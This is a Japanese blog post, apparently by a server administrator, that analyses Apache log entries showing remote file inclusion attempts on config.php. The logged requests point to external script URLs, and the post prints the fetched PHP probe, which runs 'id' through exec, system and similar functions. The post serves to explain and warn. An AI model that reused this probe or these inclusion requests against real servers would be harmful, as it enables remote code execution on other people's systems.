PHP config.phpへの不正アクセス

PHPのセキュリティ、PHPへの不正アクセスについて書きます。

apacheのエラーログを流していたら、ヘンなログを見かけました。

[Fri Jan 18 01:54:47 2008] [error] [client 212.129.206.145] script
'/foo/bar/htdocs/config.php' not found or unable to stat

config.phpをねらうなんて、明らかに不正な香りが漂っています。

apacheのアクセスログも調査をしてみました。
外部のスクリプトを読み込ませ、実行させようとしているように見えるクエリが渡ってきています。ユーザエージェントは、perlと言っています。

194.30.169.80 - - [18/Jan/2008:01:39:32 +0900] "GET
/config.php?fpath=http://www.gumgangfarm.com/shop/data/id.txt?
HTTP/1.1" 404 8322 "-" "libwww-perl/5.805"
212.129.206.145 - - [18/Jan/2008:01:54:47 +0900] "GET
/config.php?fpath=http://politics.wwf.gr/help/css/cmd.txt? HTTP/1.1"
404 8322 "-" "libwww-perl/5.79"
212.129.206.145 - - [18/Jan/2008:01:54:51 +0900] "GET
/youtube/search/config.ph
?fpath=http://politics.wwf.gr/help/css/cmd.txt? HTTP/1.1" 200 11959
"-" "libwww-perl/5.79"

とりあえず、IPアドレスのFQDNを調べてみました。

$ host 194.30.169.80
80.169.30.194.in-addr.arpa domain name pointer
babar.kontrollpanelen.se.
$ host 212.129.206.145
145.206.129.212.in-addr.arpa domain name pointer
hgv-c-4e91.adsl.wanadoo.nl.

http://www.gumgangfarm.com/shop/data/id.txt
を読んでみました。少し整形してあります。

このPHPスクリプトは、idコマンドを実行するして echo するだけのようです。うまくいったら、きっと次のスクリプトを流し込んで、あんなことや、こんなことをされちゃうのでしょう。

<?php
echo "Mic22";
$cmd="id";
$eseguicmd=ex($cmd);
echo $eseguicmd;
function ex($cfe){
	$res = '';
	if (!empty($cfe)){
		if(function_exists('exec')){
			@exec($cfe,$res);
			$res = join("\n",$res);
		}
		elseif(function_exists('shell_exec')){
			$res = @shell_exec($cfe);
		}
		elseif(function_exists('system')){
			@ob_start();
			@system($cfe);
			$res = @ob_get_contents();
			@ob_end_clean();
		}
		elseif(function_exists('passthru')){
			@ob_start();
			@passthru($cfe);
			$res = @ob_get_contents();
			@ob_end_clean();
		}
		elseif(@is_resource($f = @popen($cfe,"r"))){
			$res = "";
			while(!@feof($f)) { $res .= @fread($f,1024); }
			@pclose($f);
		}}
		return $res;
}
exit;

リモートのファイルを開けるように設定をしてあって、かつ、config.phpなんて誰でも作りそうな名前のPHPスクリプトを外部からアクセスできる場所に公開してしまっている人は、気をつけてくださいね。セキュリティに特効薬はありません。

参照しているページ (サイト内): [2008-01-31-1]

いつもシェア、ありがとうございます！

もっと情報を探しませんか？

security

過去ログ

2020 : 01 02 03 04 05 06 07 08 09 10 11 12
2019 : 01 02 03 04 05 06 07 08 09 10 11 12
2018 : 01 02 03 04 05 06 07 08 09 10 11 12
2017 : 01 02 03 04 05 06 07 08 09 10 11 12
2016 : 01 02 03 04 05 06 07 08 09 10 11 12
2015 : 01 02 03 04 05 06 07 08 09 10 11 12
2014 : 01 02 03 04 05 06 07 08 09 10 11 12
2013 : 01 02 03 04 05 06 07 08 09 10 11 12
2012 : 01 02 03 04 05 06 07 08 09 10 11 12
2011 : 01 02 03 04 05 06 07 08 09 10 11 12
2010 : 01 02 03 04 05 06 07 08 09 10 11 12
2009 : 01 02 03 04 05 06 07 08 09 10 11 12
2008 : 01 02 03 04 05 06 07 08 09 10 11 12
2007 : 01 02 03 04 05 06 07 08 09 10 11 12
2006 : 01 02 03 04 05 06 07 08 09 10 11 12
2005 : 01 02 03 04 05 06 07 08 09 10 11 12
2004 : 01 02 03 04 05 06 07 08 09 10 11 12
2003 : 01 02 03 04 05 06 07 08 09 10 11 12